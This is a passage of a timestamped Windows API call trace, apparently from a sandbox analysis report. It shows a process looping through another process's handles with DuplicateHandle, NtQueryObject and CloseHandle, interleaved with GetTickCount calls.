bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.919] GetTickCount () returned 0xe86614 [0113.919] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.919] GetTickCount () returned 0xe86614 [0113.920] GetTickCount () returned 0xe86614 [0113.920] CloseHandle (hObject=0x1b8) returned 1 [0113.920] GetTickCount () returned 0xe86614 [0113.920] CloseHandle (hObject=0x198) returned 1 [0113.920] GetTickCount () returned 0xe86614 [0113.920] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2f0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.920] GetTickCount () returned 0xe86614 [0113.920] GetTickCount () returned 0xe86614 [0113.920] CloseHandle (hObject=0x198) returned 1 [0113.920] GetTickCount () returned 0xe86614 [0113.920] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2f4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.920] GetTickCount () returned 0xe86614 [0113.920] GetTickCount () returned 0xe86614 [0113.921] CloseHandle (hObject=0x198) returned 1 [0113.921] GetTickCount () returned 0xe86614 [0113.921] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2f8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.921] GetTickCount () returned 0xe86614 [0113.921] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.921] GetTickCount () returned 0xe86614 [0113.921] GetTickCount () returned 0xe86614 [0113.921] CloseHandle (hObject=0x1b8) returned 1 [0113.921] GetTickCount () returned 0xe86614 [0113.921] CloseHandle (hObject=0x198) returned 1 [0113.921] GetTickCount () returned 0xe86614 [0113.921] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2fc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.921] GetTickCount () returned 0xe86614 [0113.922] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.922] GetTickCount () returned 0xe86614 [0113.922] GetTickCount () returned 0xe86614 [0113.922] CloseHandle (hObject=0x1b8) returned 1 [0113.922] GetTickCount () returned 0xe86614 [0113.922] CloseHandle (hObject=0x198) returned 1 [0113.922] GetTickCount () returned 0xe86614 [0113.922] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x300, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.922] GetTickCount () returned 0xe86614 [0113.922] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.922] GetTickCount () returned 0xe86614 [0113.922] GetTickCount () returned 0xe86614 [0113.923] CloseHandle (hObject=0x1b8) returned 1 [0113.923] GetTickCount () returned 0xe86614 [0113.923] CloseHandle (hObject=0x198) returned 1 [0113.923] GetTickCount () returned 0xe86614 [0113.923] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x304, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.923] GetTickCount () returned 0xe86614 [0113.923] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.923] GetTickCount () returned 0xe86614 [0113.923] GetTickCount () returned 0xe86614 [0113.923] CloseHandle (hObject=0x1b8) returned 1 [0113.923] GetTickCount () returned 0xe86614 [0113.923] CloseHandle (hObject=0x198) returned 1 [0113.923] GetTickCount () returned 0xe86614 [0113.924] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x308, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.924] GetTickCount () returned 0xe86614 [0113.924] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.924] GetTickCount () returned 0xe86614 [0113.924] GetTickCount () returned 0xe86614 [0113.924] CloseHandle (hObject=0x1b8) returned 1 [0113.924] GetTickCount () returned 0xe86614 [0113.924] CloseHandle (hObject=0x198) returned 1 [0113.924] GetTickCount () returned 0xe86614 [0113.924] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x30c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.924] GetTickCount () returned 0xe86614 [0113.925] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.925] GetTickCount () returned 0xe86614 [0113.925] GetTickCount () returned 0xe86614 [0113.925] CloseHandle (hObject=0x1b8) returned 1 [0113.925] GetTickCount () returned 0xe86614 [0113.925] CloseHandle (hObject=0x198) returned 1 [0113.925] GetTickCount () returned 0xe86614 [0113.925] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x310, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.925] GetTickCount () returned 0xe86614 [0113.925] GetTickCount () returned 0xe86614 [0113.925] CloseHandle (hObject=0x198) returned 1 [0113.925] GetTickCount () returned 0xe86614 [0113.926] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x314, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.926] GetTickCount () returned 0xe86614 [0113.926] GetTickCount () returned 0xe86614 [0113.926] CloseHandle (hObject=0x198) returned 1 [0113.926] GetTickCount () returned 0xe86614 [0113.926] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x318, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.926] GetTickCount () returned 0xe86614 [0113.926] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.926] GetTickCount () returned 0xe86614 [0113.926] GetTickCount () returned 0xe86614 [0113.926] CloseHandle (hObject=0x1b8) returned 1 [0113.926] GetTickCount () returned 0xe86614 [0113.926] CloseHandle (hObject=0x198) returned 1 [0113.927] GetTickCount () returned 0xe86614 [0113.927] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x31c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.927] GetTickCount () returned 0xe86614 [0113.927] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.927] GetTickCount () returned 0xe86614 [0113.927] GetTickCount () returned 0xe86614 [0113.927] CloseHandle (hObject=0x1b8) returned 1 [0113.927] GetTickCount () returned 0xe86614 [0113.927] CloseHandle (hObject=0x198) returned 1 [0113.927] GetTickCount () returned 0xe86614 [0113.927] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x320, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.927] GetTickCount () returned 0xe86614 [0113.927] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.928] GetTickCount () returned 0xe86614 [0113.928] GetTickCount () returned 0xe86614 [0113.928] CloseHandle (hObject=0x1b8) returned 1 [0113.928] GetTickCount () returned 0xe86614 [0113.928] CloseHandle (hObject=0x198) returned 1 [0113.928] GetTickCount () returned 0xe86614 [0113.928] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x324, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.928] GetTickCount () returned 0xe86614 [0113.928] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.928] GetTickCount () returned 0xe86614 [0113.928] GetTickCount () returned 0xe86614 [0113.929] CloseHandle (hObject=0x1b8) returned 1 [0113.929] GetTickCount () returned 0xe86614 [0113.929] CloseHandle (hObject=0x198) returned 1 [0113.929] GetTickCount () returned 0xe86624 [0113.929] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x328, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.929] GetTickCount () returned 0xe86624 [0113.929] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.929] GetTickCount () returned 0xe86624 [0113.929] GetTickCount () returned 0xe86624 [0113.929] CloseHandle (hObject=0x1b8) returned 1 [0113.929] GetTickCount () returned 0xe86624 [0113.929] CloseHandle (hObject=0x198) returned 1 [0113.929] GetTickCount () returned 0xe86624 [0113.930] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x32c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.930] GetTickCount () returned 0xe86624 [0113.930] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.930] GetTickCount () returned 0xe86624 [0113.930] GetTickCount () returned 0xe86624 [0113.930] CloseHandle (hObject=0x1b8) returned 1 [0113.930] GetTickCount () returned 0xe86624 [0113.930] CloseHandle (hObject=0x198) returned 1 [0113.930] GetTickCount () returned 0xe86624 [0113.930] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x330, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.930] GetTickCount () returned 0xe86624 [0113.930] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.930] GetTickCount () returned 0xe86624 [0113.931] GetTickCount () returned 0xe86624 [0113.931] CloseHandle (hObject=0x1b8) returned 1 [0113.931] GetTickCount () returned 0xe86624 [0113.931] CloseHandle (hObject=0x198) returned 1 [0113.931] GetTickCount () returned 0xe86624 [0113.931] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x334, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.931] GetTickCount () returned 0xe86624 [0113.931] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.931] GetTickCount () returned 0xe86624 [0113.931] GetTickCount () returned 0xe86624 [0113.931] CloseHandle (hObject=0x1b8) returned 1 [0113.932] GetTickCount () returned 0xe86624 [0113.932] CloseHandle (hObject=0x198) returned 1 [0113.932] GetTickCount () returned 0xe86624 [0113.932] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x338, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.932] GetTickCount () returned 0xe86624 [0113.932] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.932] GetTickCount () returned 0xe86624 [0113.932] GetTickCount () returned 0xe86624 [0113.932] CloseHandle (hObject=0x1b8) returned 1 [0113.932] GetTickCount () returned 0xe86624 [0113.932] CloseHandle (hObject=0x198) returned 1 [0113.932] GetTickCount () returned 0xe86624 [0113.933] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x33c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.933] GetTickCount () returned 0xe86624 [0113.933] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.933] GetTickCount () returned 0xe86624 [0113.933] GetTickCount () returned 0xe86624 [0113.933] CloseHandle (hObject=0x1b8) returned 1 [0113.933] GetTickCount () returned 0xe86624 [0113.933] CloseHandle (hObject=0x198) returned 1 [0113.933] GetTickCount () returned 0xe86624 [0113.933] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x340, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.933] GetTickCount () returned 0xe86624 [0113.933] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.933] GetTickCount () returned 0xe86624 [0113.933] GetTickCount () returned 0xe86624 [0113.934] CloseHandle (hObject=0x1b8) returned 1 [0113.934] GetTickCount () returned 0xe86624 [0113.934] CloseHandle (hObject=0x198) returned 1 [0113.934] GetTickCount () returned 0xe86624 [0113.934] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x344, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.934] GetTickCount () returned 0xe86624 [0113.934] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.934] GetTickCount () returned 0xe86624 [0113.934] GetTickCount () returned 0xe86624 [0113.934] CloseHandle (hObject=0x1b8) returned 1 [0113.934] GetTickCount () returned 0xe86624 [0113.934] CloseHandle (hObject=0x198) returned 1 [0113.935] GetTickCount () returned 0xe86624 [0113.935] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x348, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.935] GetTickCount () returned 0xe86624 [0113.935] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.935] GetTickCount () returned 0xe86624 [0113.935] GetTickCount () returned 0xe86624 [0113.935] CloseHandle (hObject=0x1b8) returned 1 [0113.935] GetTickCount () returned 0xe86624 [0113.935] CloseHandle (hObject=0x198) returned 1 [0113.935] GetTickCount () returned 0xe86624 [0113.935] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x34c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.935] GetTickCount () returned 0xe86624 [0113.935] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.935] GetTickCount () returned 0xe86624 [0113.935] GetTickCount () returned 0xe86624 [0113.936] CloseHandle (hObject=0x1b8) returned 1 [0113.936] GetTickCount () returned 0xe86624 [0113.947] CloseHandle (hObject=0x198) returned 1 [0113.947] GetTickCount () returned 0xe86633 [0113.947] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x350, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.947] GetTickCount () returned 0xe86633 [0113.947] GetTickCount () returned 0xe86633 [0113.947] CloseHandle (hObject=0x198) returned 1 [0113.947] GetTickCount () returned 0xe86633 [0113.947] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x354, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.947] GetTickCount () returned 0xe86633 [0113.947] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.947] GetTickCount () returned 0xe86633 [0113.947] GetTickCount () returned 0xe86633 [0113.948] CloseHandle (hObject=0x1b8) returned 1 [0113.948] GetTickCount () returned 0xe86633 [0113.948] CloseHandle (hObject=0x198) returned 1 [0113.948] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x358, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.948] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.948] CloseHandle (hObject=0x1b8) returned 1 [0113.948] CloseHandle (hObject=0x198) returned 1 [0113.948] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x35c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.949] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.949] CloseHandle (hObject=0x1b8) returned 1 [0113.949] CloseHandle (hObject=0x198) returned 1 [0113.949] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x360, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.949] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.949] CloseHandle (hObject=0x1b8) returned 1 [0113.949] CloseHandle (hObject=0x198) returned 1 [0113.950] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x364, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.950] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.950] CloseHandle (hObject=0x1b8) returned 1 [0113.950] CloseHandle (hObject=0x198) returned 1 [0113.950] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x368, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.950] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.950] CloseHandle (hObject=0x1b8) returned 1 [0113.951] CloseHandle (hObject=0x198) returned 1 [0113.951] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x36c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.951] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.951] CloseHandle (hObject=0x1b8) returned 1 [0113.951] CloseHandle (hObject=0x198) returned 1 [0113.951] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x370, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.951] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.952] CloseHandle (hObject=0x1b8) returned 1 [0113.952] CloseHandle (hObject=0x198) returned 1 [0113.952] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x374, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.952] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.952] CloseHandle (hObject=0x1b8) returned 1 [0113.952] CloseHandle (hObject=0x198) returned 1 [0113.952] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x378, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.952] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.953] CloseHandle (hObject=0x1b8) returned 1 [0113.953] CloseHandle (hObject=0x198) returned 1 [0113.953] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x37c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.953] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.953] CloseHandle (hObject=0x1b8) returned 1 [0113.953] CloseHandle (hObject=0x198) returned 1 [0113.953] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x380, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.954] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.954] CloseHandle (hObject=0x1b8) returned 1 [0113.954] CloseHandle (hObject=0x198) returned 1 [0113.954] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x384, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.954] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.954] CloseHandle (hObject=0x1b8) returned 1 [0113.955] CloseHandle (hObject=0x198) returned 1 [0113.955] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x388, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.955] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.955] CloseHandle (hObject=0x1b8) returned 1 [0113.955] CloseHandle (hObject=0x198) returned 1 [0113.955] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x38c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.955] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.956] CloseHandle (hObject=0x1b8) returned 1 [0113.956] CloseHandle (hObject=0x198) returned 1 [0113.956] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x390, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: 